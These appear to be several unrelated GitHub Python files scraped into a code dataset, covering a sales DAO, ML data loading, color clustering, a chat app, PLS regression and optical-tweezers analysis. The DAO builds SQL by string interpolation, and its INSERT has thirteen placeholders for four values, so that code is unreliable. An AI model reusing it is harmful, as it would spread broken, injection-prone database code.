\n","repo_name":"mehmetpekmezci/gtu-rir","sub_path":"01.data_collection/02.recording_data/02.data_recording/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"18043344795","text":"from src.data.dao.abstract_dao import AbstractDAO\nfrom src.data.dao.produto_dao import ProdutoDAO\nfrom src.data.database.database import Database\nfrom src.domain.models.venda_produtos import VendaProduto\n\n\nclass VendasProdutoDAO(AbstractDAO):\n def __init__(self, database: Database) -> None:\n super().__init__(database, 'vendas_produtos')\n self.__database = database\n self.__schema = super().schema\n self.__table = super().table\n\n @staticmethod\n def __get_columns_joined():\n return ', '.join([\n 'vp.id AS venda_produto_id', 'vp.id_venda', 'vp.id_produto', 'vp.quantidade',\n 'p.id', 'p.id_tipo_produto', 'p.titulo', 'p.descricao', 'p.custo', 'p.margem_lucro',\n 'p.fabricante',\n 'p.autor', 'p.edicao', 'p.editora', 'p.isbn', 'p.pais', 'p.desconto'\n ])\n\n def execute_query(self, query: str):\n super().execute_query(query)\n\n def get_all(self, custom_query=\"\") -> [VendaProduto]:\n table = super().get_table()\n columns = VendasProdutoDAO.__get_columns_joined()\n\n custom_query = f\"\"\"\n SELECT {columns} FROM {table} vp\n INNER JOIN book_pdv.produtos p\n ON vp.id_produto = p.id\n \"\"\"\n\n rows = super().get_all(custom_query)\n\n venda_produtos = list(map(lambda row: VendasProdutoDAO.__parse_venda_produto(row), rows))\n\n return venda_produtos\n\n def get_by_id(self, id_venda_produto: int) -> VendaProduto | None:\n table = super().get_table()\n columns = VendasProdutoDAO.__get_columns_joined()\n\n custom_query = f\"\"\"\n SELECT {columns} FROM {table} vp\n INNER JOIN book_pdv.produtos p\n ON vp.id_produto = p.id\n WHERE venda_produto_id = {id_venda_produto}\n \"\"\"\n\n row = super().get_by_pk(\"id\", id_venda_produto, custom_query)\n\n venda_produto = None if row is None else VendasProdutoDAO.__parse_venda_produto(row)\n return venda_produto\n\n def persist_entity(self, venda_produto: VendaProduto) -> None:\n table = super().get_table()\n columns = \"id, id_venda, id_produto, quantidade\"\n\n super().persist(\n f\"\"\" INSERT INTO {table} ({columns}) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\",\n (\n venda_produto.id,\n venda_produto.id_venda,\n venda_produto.produto.id,\n venda_produto.quantidade\n ),\n )\n\n def delete_entity(self, id_venda_produto: int) -> None:\n super().delete(\"id\", id_venda_produto)\n\n def update_entity(self, id_venda_produto: int, attribute, value) -> None:\n super().update(\"id\", id_venda_produto, attribute, value)\n\n @staticmethod\n def __parse_venda_produto(row: dict):\n id = row['venda_produto_id']\n id_venda = row['id_venda']\n\n produto = ProdutoDAO.parse_produto(row)\n\n quantidade = row['quantidade']\n\n return VendaProduto(\n id,\n id_venda,\n produto,\n quantidade\n )\n","repo_name":"Franco904/book-pdv","sub_path":"src/data/dao/vendas_produtos_dao.py","file_name":"vendas_produtos_dao.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"40303191641","text":"import pandas as pd\nfrom utils.textprocessing import transform_original_dataframe\n\ndef load_data(transform_data=True):\n # read raw data from csv file\n train_df = pd.read_csv('drive/kaikeba/Abstract/data/AutoMaster_TrainSet.csv', encoding='utf-8')\n test_df = pd.read_csv('drive/kaikeba/Abstract/data/AutoMaster_TestSet.csv', encoding='utf-8')\n\n # remove rows contain na\n train_df = train_df.dropna()\n test_df = test_df.dropna()\n\n # merge question column and dialog column\n if transform_data:\n trans_train_df = transform_original_dataframe(train_df)\n trans_test_df = transform_original_dataframe(test_df)\n else:\n trans_train_df = train_df\n trans_test_df = test_df\n\n train_question_list = trans_train_df['Question'].tolist()\n train_dialog_list = trans_train_df['Dialogue'].tolist()\n train_report_list = trans_train_df['Report'].tolist()\n\n test_question_list = trans_test_df['Question'].tolist()\n test_dialog_list = trans_test_df['Dialogue'].tolist()\n\n train_X = []\n train_Y = train_report_list\n for i, question in enumerate(train_question_list):\n curr_train = question + ' ' + train_dialog_list[i]\n curr_train = curr_train.replace('', '').replace('', '').strip()\n train_X.append(curr_train)\n\n test_X = []\n for i, question in enumerate(test_question_list):\n curr_test = question + ' ' + test_dialog_list[i]\n curr_test = curr_test.replace('', '').replace('', '').strip()\n test_X.append(curr_test)\n\n return train_X, train_Y, test_X\n\n\nif __name__ == '__main__':\n train_X, train_Y, test_X = load_data()\n","repo_name":"NekoPunchMoe/QA-summary-and-reasoning","sub_path":"utils/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"3108010278","text":"# Author : Hyunwoong\n# When : 6/19/2019\n# Homepage : github.com/gusdnd852\n\nimport operator\n\nimport cv2\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\n\nclass ColorExtractor:\n def centroid_histogram(self, clt):\n numLabels = np.arange(0, len(np.unique(clt.labels_)) + 1)\n (hist, _) = np.histogram(clt.labels_, bins=numLabels)\n hist = hist.astype(\"float\")\n hist /= hist.sum()\n return hist\n\n def plot_colors(self, hist, centroids):\n bar = np.zeros((50, 300, 3), dtype=\"uint8\")\n startX = 0\n percent_arr = {}\n\n for (percent, color) in zip(hist, centroids):\n percent_arr[str(percent)] = color\n\n percent_arr = sorted(percent_arr.items(), key=operator.itemgetter(0))\n percent_arr.reverse()\n\n for (percent, color) in zip(hist, centroids):\n endX = startX + (percent * 300)\n cv2.rectangle(bar, (int(startX), 0), (int(endX), 50),\n color.astype(\"uint8\").tolist(), -1)\n startX = endX\n return bar, percent_arr\n\n def image_color_cluster(self, image_path, k=3):\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.reshape((image.shape[0] * image.shape[1], 3))\n\n clt = KMeans(n_clusters=k)\n clt.fit(image)\n\n hist = self.centroid_histogram(clt)\n bar, p_arr = self.plot_colors(hist, clt.cluster_centers_)\n return p_arr\n\n def get_color(self, file_name, k=3):\n col = self.image_color_cluster(file_name, k)\n return col\n","repo_name":"hyunwoongko/social-robot-bao","sub_path":"python/painter/grayscale/color_extractor.py","file_name":"color_extractor.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"23"} +{"seq_id":"72009603580","text":"#!/usr/bin/python3\n\"\"\"\nThis Python script accepts a URL as a command-line argument,\nsends an HTTP request to the URL,\nand then extracts and displays the value of the 'X-Request-Id'\nfield from the response headers.\n\"\"\"\n\nimport requests\nfrom sys import argv\n\nif __name__ == '__main__':\n # Ensure the script is executed as the main program\n if len(argv) != 2:\n print(\"Usage: python script.py \")\n else:\n # Retrieve the URL from the command-line argument\n url = argv[1]\n\n # Send an HTTP GET request to the specified URL\n response = requests.get(url)\n\n x_request_id = response.headers.get('X-Request-Id')\n if x_request_id:\n print(f\"X-Request-Id: {x_request_id}\")\n","repo_name":"JordansFamiliar/alx-higher_level_programming","sub_path":"0x11-python-network_1/5-hbtn_header.py","file_name":"5-hbtn_header.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"74224391098","text":"VERSION = \"1.5.1dev\"\n\n# The choices for the Trove Development Status line:\n# Development Status :: 5 - Production/Stable\n# Development Status :: 4 - Beta\n# Development Status :: 3 - Alpha\n\nclassifiers = \"\"\"\\\nIntended Audience :: Developers\nLicense :: OSI Approved :: Zope Public License\nProgramming Language :: Python\nTopic :: Database\nTopic :: Software Development :: Libraries :: Python Modules\nOperating System :: Microsoft :: Windows\nOperating System :: Unix\n\"\"\"\n\nimport os\nfrom setuptools import setup\n\ndoclines = __doc__.split(\"\\n\")\n\ndef read_file(*path):\n base_dir = os.path.dirname(__file__)\n file_path = (base_dir, ) + tuple(path)\n return file(os.path.join(*file_path)).read()\n\nsetup(\n name=\"RelStorage\",\n version=VERSION,\n author=\"Zope Foundation and Contributors\",\n maintainer=\"Shane Hathaway\",\n maintainer_email=\"shane@hathawaymix.org\",\n url=\"http://pypi.python.org/pypi/RelStorage\",\n packages=[\n 'relstorage',\n 'relstorage.adapters',\n 'relstorage.adapters.tests',\n 'relstorage.tests',\n 'relstorage.tests.blob',\n ],\n package_data={\n 'relstorage': ['component.xml'],\n },\n license=\"ZPL 2.1\",\n platforms=[\"any\"],\n description=doclines[0],\n classifiers=filter(None, classifiers.split(\"\\n\")),\n long_description = (\n read_file(\"README.txt\") + \"\\n\\n\" +\n \"Change History\\n\" +\n \"==============\\n\\n\" +\n read_file(\"CHANGES.txt\")),\n zip_safe=False, # otherwise ZConfig can't see component.xml\n install_requires=[\n 'ZODB3>=3.7.0',\n 'zope.interface',\n 'zc.lockfile',\n ],\n extras_require={\n 'mysql': ['MySQL-python>=1.2.2'],\n 'postgresql': ['psycopg2>=2.0'],\n 'oracle': ['cx_Oracle>=4.3.1'],\n },\n entry_points = {'console_scripts': [\n 'zodbconvert = relstorage.zodbconvert:main',\n 'zodbpack = relstorage.zodbpack:main',\n ]},\n test_suite='relstorage.tests.alltests.make_suite',\n)\n","repo_name":"cjw296/relstorage","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"23"} +{"seq_id":"43333043716","text":"# This file is part of sbi, a toolkit for simulation-based inference. sbi is licensed\n# under the Affero General Public License v3, see .\n\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Dict, Optional, Tuple\n\nimport numpy as np\nimport torch\nfrom torch import Tensor\nfrom torch import nn\n\nfrom sbi import utils as utils\nfrom sbi.user_input.user_input_checks import process_x\nfrom sbi.utils.torchutils import (\n atleast_2d_float32_tensor,\n ensure_theta_batched,\n)\n\n\nclass NeuralPosterior(ABC):\n r\"\"\"Posterior $p(\\theta|x)$ with `log_prob()` and `sample()` methods.

\n All inference methods in sbi train a neural network which is then used to obtain\n the posterior distribution. The `NeuralPosterior` class wraps the trained network\n such that one can directly evaluate the (unnormalized) log probability and draw\n samples from the posterior. The neural network itself can be accessed via the `.net`\n attribute.\n \"\"\"\n\n def __init__(\n self, method_family: str, neural_net: nn.Module, prior, x_shape: torch.Size, device: str = \"cpu\",\n ):\n \"\"\"\n Args:\n method_family: One of snpe, snl, snre_a or snre_b.\n neural_net: A classifier for SNRE, a density estimator for SNPE and SNL.\n prior: Prior distribution with `.log_prob()` and `.sample()`.\n x_shape: Shape of a single simulator output.\n device: Training device, e.g., cpu or cuda.\n \"\"\"\n if method_family in (\"snpe\", \"snle\", \"snre_a\", \"snre_b\"):\n self._method_family = method_family\n else:\n raise ValueError(\"Method family unsupported.\")\n\n self.net = neural_net\n self.device = device\n self.prior = prior\n\n @abstractmethod\n def log_prob(self, theta: Tensor, x: Optional[Tensor] = None, track_gradients: bool = False,) -> Tensor:\n \"\"\"See child classes for docstring.\"\"\"\n pass\n\n def _prepare_theta_and_x_for_log_prob_(self, theta: Tensor, x: Optional[Tensor] = None,) -> Tuple[Tensor, Tensor]:\n r\"\"\"Returns $\\theta$ and $x$ in shape that can be used by posterior.log_prob().\n\n Checks shapes of $\\theta$ and $x$ and then repeats $x$ as often as there were\n batch elements in $\\theta$.\n\n Args:\n theta: Parameters $\\theta$.\n x: Conditioning context for posterior $p(\\theta|x)$. If not provided, fall\n back onto an `x_o` if previously provided for multi-round training, or\n to another default if set later for convenience, see `.set_default_x()`.\n\n Returns:\n ($\\theta$, $x$) with the same batch dimension, where $x$ is repeated as\n often as there were batch elements in $\\theta$ originally.\n \"\"\"\n\n theta = ensure_theta_batched(torch.as_tensor(theta))\n\n # Select and check x to condition on.\n x = atleast_2d_float32_tensor(self._x_else_default_x(x))\n self._ensure_single_x(x)\n self._ensure_x_consistent_with_default_x(x)\n\n # Repeat `x` in case of evaluation on multiple `theta`. This is needed below in\n # when calling nflows in order to have matching shapes of theta and context x\n # at neural network evaluation time.\n x = self._match_x_with_theta_batch_shape(x, theta)\n\n return theta, x\n","repo_name":"smsharma/neural-global-astrometry","sub_path":"sbi/inference/posteriors/base_posterior.py","file_name":"base_posterior.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"23"} +{"seq_id":"33414354588","text":"\"\"\"\nTitle: AoiHasuChat\nAuthor: [Guido Marinelli](https://github.com/GuidoMarinelli/)\nDate created: 2023/11/01\nLast modified: 2023/11/08\nDescription: Use Panel in creating a simple Chat app.\n\"\"\"\n\nimport panel as pn\n\nfrom langchain.chains import LLMChain\nfrom langchain.llms import CTransformers\nfrom langchain.prompts import PromptTemplate\nfrom langchain.memory import ConversationBufferMemory\n\npn.extension(theme='dark')\n\nMODEL_PATH = \"./meta_models/llama-2-7b-chat/ggml-model-q4_k_m.gguf\"\n\nTEMPLATE = \"\"\"[INST] You are a friendly chat bot named Blue who's willing to help answer the user:\n\n{chat_history}\nHuman: {human_input}\nAI: [/INST] \n\"\"\"\n\nCONFIG = {\"temperature\": 0.5, \"max_new_tokens\": 256, \"context_length\": 2048, \"stream\": True}\n\nmemory = ConversationBufferMemory(memory_key=\"chat_history\")\n\n\nasync def callback(contents: str, user: str, instance: pn.chat.ChatInterface):\n prompt = PromptTemplate(\n template=TEMPLATE, input_variables=[\"chat_history\", \"human_input\"]\n )\n\n llm = CTransformers(model=MODEL_PATH, model_type=\"llama2\", config=CONFIG, gpu_layers=1)\n\n llm_chain = LLMChain(llm=llm,\n prompt=prompt,\n memory=memory,\n )\n message = None\n response = await llm_chain.apredict(human_input=contents)\n for chunk in response:\n message = instance.stream(chunk, user=\"Blue\", message=message, avatar=\"https://upload.wikimedia.org/wikipedia/commons/thumb/0/04/ChatGPT_logo.svg/1024px-ChatGPT_logo.svg.png?20230318122128\")\n\n\nchat_interface = pn.chat.ChatInterface(callback=callback, placeholder_threshold=0.1)\nchat_interface.send(\n \"Send a message to get a reply from Llama 2!\",\n user=\"System\",\n respond=False,\n)\nchat_interface.servable()\n","repo_name":"GuidoMarinelli/AoiHasuAI","sub_path":"AoiHasuChat-Panel/AoiHasuChat.py","file_name":"AoiHasuChat.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"22116935713","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 19 12:28:47 2020\n\n@author: Tamás Baráth\n\"\"\"\nimport numpy as np\nimport scipy as sp\n\nclass PLSRegression:\n #PLS with SIMPLS algo as I dont trust scikit-learn\n def __init__(self,n_components,P=None,scale=False):\n self.n_components = n_components\n self.P=P\n \n def fit(self,X,Y):\n assert Y.ndim == 2, 'Y needs to be a 2D array. if there is only one column, make sure it is of shape (n,1)'\n\n n_components=self.n_components\n P=self.P\n \n N = X.shape[0]\n K = X.shape[1]\n q = Y.shape[1]\n \n if P is None:\n P = np.identity(n = N) / N\n \n mu_x = ((P.dot(X)).sum(axis=0))/ P.sum()\n mu_y = ((P.dot(Y)).sum(axis=0))/ P.sum()\n \n \n Xc = X - mu_x\n Yc = Y - mu_y\n self.mu_x=mu_x\n self.mu_y=mu_y\n \n \n R = np.zeros((K, n_components)) # Weights to get T components\n V = np.zeros((K, n_components)) # orthonormal base for X loadings\n S = Xc.T.dot(P).dot(Yc) # cov matrix\n \n aa = 0\n\n while aa < n_components:\n \n r = S[:,:] \n \n if q > 1:\n \n U, sval, V = sp.linalg.svd(S, full_matrices=True, compute_uv=True) \n r = U[:, 0]\n \n \n t = Xc.dot(r)\n t.shape = (N, 1)\n t = t - ((P.dot(t)).sum(axis=0)/ P.sum())\n T_scale = np.sqrt(t.T.dot(P).dot(t))\n # Normalize\n t = t / T_scale \n r = r / T_scale\n r.shape = (K, 1)\n p = Xc.T.dot(P).dot(t)\n v = p\n v.shape = (K, 1)\n \n if aa > 0:\n v = v - V.dot(V.T.dot(p))\n \n v = v / np.sqrt(v.T.dot(v))\n S = S - v.dot(v.T.dot(S))\n \n R[:, aa] = r[:, 0]\n V[:, aa] = v[:, 0]\n \n aa += 1\n \n T = Xc.dot(R)\n \n tcal_raw0 = np.concatenate((np.ones((X.shape[0], 1)), T), axis=1)\n wtemp = np.linalg.solve(tcal_raw0.T.dot(P.dot(tcal_raw0)), tcal_raw0.T.dot(P.dot(Y))) \n \n self.R=R \n self.b = wtemp[0,0] \n self.BPLS = R.dot(wtemp[1:, :])\n \n def predict(self, X):\n\n Ypred = self.mu_y + (X - self.mu_x).dot(self.BPLS)\n\n return Ypred\n \n \n \n ","repo_name":"BarathTamas/NIR-Thesis-Public","sub_path":"pls.py","file_name":"pls.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"7232562979","text":"# Exercise 2 - Steven Sousa 10-15-2020\n\nimport turtle\n\nbreski = turtle.Turtle()\nwn = turtle.Screen()\nbreski.pensize(4)\nsz = 20\n\ndef drawsquare(t, sz):\n for a in range(4):\n breski.forward(sz)\n breski.left(90)\n\n\nfor b in range(5):\n drawsquare(breski, sz) # Calls function\n breski.penup() # lifts pen\n breski.setx(breski.xcor()-10) # moves breski back in the xy plane by -10 units\n breski.sety(breski.ycor()-10) # moves breski down in the xy plane by -10 units\n breski.pendown() # lowers pen\n sz = sz + 20 # increases size the size of the square in each iteration\n\nwn.exitonclick()\n","repo_name":"Stevensousa67/CSC105","sub_path":"Textbook_Exercises/Chapter 6/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"31104661402","text":"import copy\nimport logging as log\nfrom collections import OrderedDict\nimport pandas as pd\nimport numpy as np\n\nfrom tweezers.container.TweezersAnalysis import TweezersAnalysis\nfrom tweezers.ixo.collections import IndexedOrderedDict\nfrom tweezers.ixo.decorators import lazy\nfrom tweezers.ixo.statistics import averageData\nfrom tweezers.meta import MetaDict, UnitDict\nfrom tweezers.plot.psd import PsdFitPlot\nfrom tweezers.plot.utils import peekPlot\nimport tweezers.calibration.psd as psd\nimport tweezers.calibration.thermal as thermal\nfrom tweezers.physics.tweezers import tcOsciHydroCorrect\n\n\nclass TweezersDataBase:\n \"\"\"\n Base class for storing tweezers data. This class should implement methods and attributes that both,\n the :class:`.TweezersData` and the :class:`.TweezersDataSegment` require.\n\n The following attributes are populated lazily on the first call.\n\n Attributes:\n meta (:class:`.MetaDict`): metadata of the experiment\n units (:class:`.UnitDict`): units of the metadata\n psd (:class:`pandas.DataFrame`): power spectrum data\n psdFit (:class:`pandas.DataFrame`): power spectrum fit data\n ts (:class:`pandas.DataFrame`): time series for thermal calibration\n \"\"\"\n\n @lazy\n def meta(self):\n \"\"\"\n Attribute that holds the metadata of the experiment. It is evaluated lazily thus the metadata is read only\n when required.\n\n Returns:\n :class:`.MetaDict`\n \"\"\"\n\n log.debug('Reading metadata from data source.')\n meta, units = self.source.getMetadata()\n self.units = units\n return meta\n\n @lazy\n def units(self):\n \"\"\"\n Attribute that holds the units to the corresponding meta data. This should be returned by the data source's\n ``getMetadata`` method as well. Evaluated lazily.\n\n Returns:\n :class:`.UnitDict`\n \"\"\"\n\n meta, units = self.source.getMetadata()\n self.meta = meta\n return units\n\n @lazy\n def ts(self):\n \"\"\"\n Attribute to hold the time series used for the thermal calibration. Evaluated lazily.\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n log.debug('Reading timeseries from data source.')\n return self.source.getTs()\n\n @lazy\n def psd(self):\n \"\"\"\n Attribute to hold the power spectrum density. If called before :meth:`.computePsd`,\n it holds the PSD from the data source, otherwise the newly computed one.\n \"\"\"\n\n log.debug('Reading PSD from data source.')\n return self.source.getPsd()\n\n @property\n def avData(self):\n \"\"\"\n Attribute to return the default downsampled and averaged data. Evaluated each time the\n attribute is called.\n \"\"\"\n\n return self.averageData(nsamples=10)\n\n def averageData(self, nsamples=10):\n \"\"\"\n Downsample the data by averaging ``nsamples``.\n\n Args:\n nsamples (`int`): number of samples to average\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n return averageData(self.data, nsamples=nsamples)\n\n def computePsd(self, **kwargs):\n \"\"\"\n Compute the power spectrum density from the experiments time series which is stored in the ``ts`` attribute.\n All arguments are forwarded to :class:`.PsdComputation`.\n This method returns a copy of the initial :class:`.TweezersData` object to prevent e.g. overwriting of\n data that was read from files.\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n # use the timeseries sampling rate as default if none is given as user input (in kwargs)\n args = {'samplingRate': self.meta['psdSamplingRate']}\n args.update(kwargs)\n\n # create copy\n t = self.copy()\n\n data = {}\n cols = ['f']\n # compute PSD for each trap\n for trap in t.meta.traps:\n psdTrap = psd.computePsd(t.ts[trap], **kwargs)[0]\n data[trap] = psdTrap['psdMean']\n data[trap + 'Std'] = psdTrap['psdStd']\n cols += [trap, trap + 'Std']\n data['f'] = psdTrap['f']\n\n # store PSD\n t.psd = pd.DataFrame(data, columns=cols)\n # store PSD metadata\n t.meta['psdBlockLength'] = psdTrap['blockLength']\n t.meta['psdNBlocks'] = psdTrap['nBlocks']\n t.meta['psdOverlap'] = psdTrap['overlap']\n\n # store PSD units\n t.units['psd'] = t.units['timeseries'] + '^2/Hz'\n\n # delete PSD fit and thermal calibration data if present to prevent confusion with newly computed PSD and old fits\n t.psdFit = None\n t.meta.deleteKey('diffusionCoefficient', 'cornerFrequency', 'psdFitError', 'psdFitR2', 'psdFitChi2',\n 'displacementSensitivity', 'forceSensitivity', 'stiffness')\n t.units.deleteKey('diffusionCoefficient', 'cornerFrequency', 'psdFitError', 'psdFitR2', 'psdFitChi2',\n 'displacementSensitivity', 'forceSensitivity', 'stiffness')\n\n return t\n\n @lazy\n def psdFit(self):\n \"\"\"\n Attribute to hold the Lorentzian fit to the power spectrum density. If called before\n :meth:`.fit_psd`, it holds the fit from the data source, otherwise the newly computed one.\n \"\"\"\n\n log.debug('Reading PSD fit from data source.')\n return self.source.getPsdFit()\n\n def fitPsd(self, **kwargs):\n \"\"\"\n Fits the PSD. All input is forwarded to the :class:`.PsdFit` object.\n This method returns a copy of the initial :class:`.TweezersData` object to prevent e.g. overwriting of\n data that was read from files.\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n # create copy that will be returned\n t = self.copy()\n\n data = {}\n cols = ['f'] + t.meta.traps\n # fit PSD for each trap\n for trap in t.meta.traps:\n # check for oscillation calibration to exclude peak from fitting\n peakF = 0\n if t.meta.psdType == 'oscillation':\n peakF = t.meta.psdOscillateFrequency\n # fit psd\n fitTrap = psd.PsdFit(t.psd.f, t.psd[trap], std=t.psd[trap + 'Std'], peakF=peakF, **kwargs)\n # store fit function data\n data[trap] = fitTrap.yFitFull\n # store fit result parameters\n t.meta[trap].update(fitTrap.fitresAsMeta())\n data['f'] = fitTrap.fFull\n\n # store PSD fit\n t.psdFit = pd.DataFrame(data, columns=cols)\n # store extra metadata\n t.meta['psdFitMinF'] = data['f'].iloc[0]\n t.meta['psdFitMaxF'] = data['f'].iloc[-1]\n\n return t\n\n def thermalCalibration(self):\n \"\"\"\n Perform a thermal calibration. Requires :meth:`.psd` and\n :meth:`.psdFit`.\n Returns a copy of the initial object.\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n t = self.copy()\n\n # sort traps such that y-traps are calibrated first, required for oscillation calibration (gets dragCoef from\n # y and uses that for x\n trapsSorted = sorted(t.meta.traps, key=lambda s: s[-1], reverse=True)\n for trap in trapsSorted:\n thermal.doThermalCalib(t, trap)\n\n # recompute forces\n t.meta, t.units, t.data = t.source.calculateForce(t.meta, t.units, t.data)\n\n return t\n\n def osciHydroCorr(self):\n \"\"\"\n Correct results of thermal calibration performed with oscillation technique.\n\n Returns a copy of the initial object.\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n t = self.copy()\n m = t.meta\n # radii in nm\n rPm = m.pmY.beadDiameter / 2 * 1000\n rAod = m.aodY.beadDiameter / 2 * 1000\n\n # get y distance\n dy = np.abs(m.pmY.trapPosition - m.aodY.trapPosition)\n\n # todo correct x-axis parameters?\n # go through y-traps\n for trap in m.traps:\n if not trap.lower().endswith('y'):\n continue\n # the radius in the equation is that of the other bead (that causes the flow field)\n [rTrap, rOther] = [rPm, rAod] if trap.lower().startswith('pm') else [rAod, rPm]\n # get correction factor\n c = tcOsciHydroCorrect(dy, rTrap=rTrap, rOther=rOther, method='oseen')\n # store correction factor\n m[trap]['hydroCorr'] = c\n # also store for x-trap\n xTrap = trap[:-1] + 'X'\n m[xTrap]['hydroCorr'] = c\n\n # correct the calibration parameters\n for trap in m.traps:\n c = m[trap].hydroCorr\n m[trap].displacementSensitivity *= c\n m[trap].stiffness /= c ** 2\n m[trap].forceSensitivity /= c\n\n # recompute data\n t.meta, t.units, t.data = t.source.postprocessData(m, t.units, t.data)\n\n return t\n\n def copy(self):\n \"\"\"\n Returns a deep copy of the object\n\n Args:\n\n\n Returns:\n :class:`.TweezersDataBase`\n \"\"\"\n\n return copy.deepcopy(self)\n\n def getFacets(self, data, colName='Value', meta=[]):\n \"\"\"\n Returns a :class:`pandas.DataFrame` suitable for a :class:`seaborn.FacetGrid`, i.e. the axis of a value is\n specified in an extra column instead of having one column per axis.\n\n Args:\n data (:class:`pandas.DataFrame`): input data\n colName (`str`): column name of the \"value\" column\n meta (`list` of `str`): list of strings, the metadata is searched for these keys and they are added as\n additional columns if available\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n # in case we have frequency or time data, keep that as index\n index = []\n if 'f' in data.columns:\n index = ['f']\n elif 't' in data.columns:\n index = ['t']\n\n resDf = pd.DataFrame()\n for col in data.columns:\n # skip index columns\n if col in index:\n continue\n\n tmpDf = data[index + [col]].rename(columns={col: colName})\n tmpDf.loc[:, 'Axis'] = col\n\n for m in meta:\n if m in self.meta[col].keys():\n tmpDf.loc[:, m] = self.meta[col][m]\n resDf = resDf.append(tmpDf)\n\n for m in meta:\n if m in self.meta.keys():\n resDf.loc[:, m] = self.meta[m]\n\n return resDf\n\n def peek(self, *cols):\n \"\"\"\n Show a :func:`.peekPlot` of the current data.\n\n Args:\n *cols: see :func:`.peekPlot`\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n peekPlot(self, *cols)\n return self\n\n def peekPsd(self):\n \"\"\"\n Plots the PSD, see :class:`.PsdFitPlot`\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n PsdFitPlot(self, residuals=False)\n return self\n\n def getAnalysis(self, name=None):\n \"\"\"\n Convert the current :class:`.TweezersData` to a :class:`.TweezersAnalysis`, the general format to store and\n exchange analysis results.\n\n Args:\n name (`str`, optional): name for the analysis file, constructed from metadata if not given (using the ID)\n\n Returns:\n :class:`.TweezersAnalysis`\n \"\"\"\n\n analysis = self.getEmptyAnalysis(name=name)\n analysis.data = copy.deepcopy(self.data)\n return analysis\n\n def getSegmentAnalysis(self, name=None):\n \"\"\"\n Convert all segments of the current :class:`.TweezersData` to a :class:`.TweezersAnalysis`, the general\n format to store and exchange analysis results.\n\n Args:\n name (`str`, optional): name for the analysis file, constructed from metadata if not given (using the ID)\n\n Returns:\n :class:`.TweezersAnalysis` or `None` if no segments are defined\n \"\"\"\n\n # if there are no segments, ignore this dataset\n if not self.segments:\n return None\n\n analysis = self.getEmptyAnalysis(name=name)\n analysis.addField('segments')\n for key in self.segments.keys():\n seg = self.getSegment(key)\n analysis.segments[key] = IndexedOrderedDict(data=seg.data, id=seg.meta.id, idSafe=seg.meta.idSafe)\n return analysis\n\n def getEmptyAnalysis(self, name=None):\n \"\"\"\n Shared code that prepares export of an analysis file, used by :meth:`.getAnalysis` and\n :meth:`.getSegmentAnalysis`.\n\n Args:\n name: see :meth:`.getAnalysis`\n\n Returns:\n :class:`.TweezersAnalysis`\n \"\"\"\n\n if not name:\n name = self.meta.id\n name = TweezersAnalysis.getFilename(name)\n\n analysis = TweezersAnalysis(name=name)\n analysis.meta = copy.deepcopy(self.meta)\n analysis.units = copy.deepcopy(self.units)\n analysis.meta['sourceClass'] = self.source.__class__.__name__\n return analysis\n\n\nclass TweezersData(TweezersDataBase):\n \"\"\"\n TweezersData structure for tweezers experiment data and metadata. It requires a data source object that\n implements the methods of :class:`.BaseSource` to populate its properties.\n Note that not all of these methods must be implemented, depending of your usage of the class. However, if\n your data source does not implement a certain method, the code\n will fail only when the according property is called since all of them are evaluated lazily.\n\n\n Attributes:\n data (:class:`pandas.DataFrame`): experimental data\n analysis (:class:`collections.OrderedDict`): storage for analysis results\n segments (:class:`.IndexedOrderedDict`): segment data\n \"\"\"\n\n def __init__(self, source=None):\n \"\"\"\n Args:\n source (:class:`.BaseSource`): a data source object like e.g. :class:`.TxtBiotecSource`\n \"\"\"\n\n super().__init__()\n # store dataSource object\n if source:\n self.source = source\n else:\n self.source = None\n self.meta = MetaDict()\n self.units = UnitDict()\n # ToDo: check:\n self.analysis = OrderedDict()\n self.segments = IndexedOrderedDict()\n\n @lazy\n def data(self):\n \"\"\"\n Attribute that holds the experiment data. It is evaluated lazily thus the data is read only when required.\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n log.debug('Reading data from data source')\n data = self.source.getData()\n self.meta, self.units, data = self.source.postprocessData(self.meta, self.units, data)\n return data\n\n def addSegment(self, tmin, tmax, name=None):\n \"\"\"\n Add a segment with the given limits.\n\n Args:\n tmin (`float`): relative starting time of the segment\n tmax (`float`): relative end time of the 